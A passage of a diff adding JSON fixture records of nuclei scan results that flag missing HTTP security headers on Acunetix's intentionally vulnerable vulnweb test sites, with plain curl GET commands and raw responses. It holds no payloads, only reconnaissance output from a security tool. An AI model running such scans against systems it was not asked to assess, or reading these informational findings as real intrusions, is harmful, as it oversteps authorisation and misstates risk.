"http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:08.789Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 457, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:08.935Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 458, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:09.109Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 459, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:09.262Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 460, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:09.416Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 461, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:09.576Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 462, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:09.720Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 463, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:09.886Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 464, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:10.057Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 465, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:10.223Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 466, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:10.373Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: 